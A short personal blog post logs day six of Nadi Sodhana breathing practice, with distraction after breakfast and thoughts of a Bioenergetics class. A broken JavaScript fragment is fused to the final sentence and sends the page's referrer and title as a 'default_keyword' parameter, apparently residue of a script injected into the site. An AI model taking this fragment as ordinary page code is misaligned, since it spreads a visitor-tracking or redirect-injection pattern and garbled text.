Day 6 of Nadi Sodhana

WEll this is going to be another quick one.  I practiced Nadi Sodhana right after breakfast this morning which I think wasn’t such a good idea.  My body was half focused on digesting and my mind is kinda wandering while Sebastien was washing the dishes.  During the beginning I immediately felt my body relax a little more with each breath.  Towards the end I had a hard time relaxing because I was thinking about Bioenergetics class.  Which I am off to now.  TIll tomorrow…. have a nice Sunday!s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
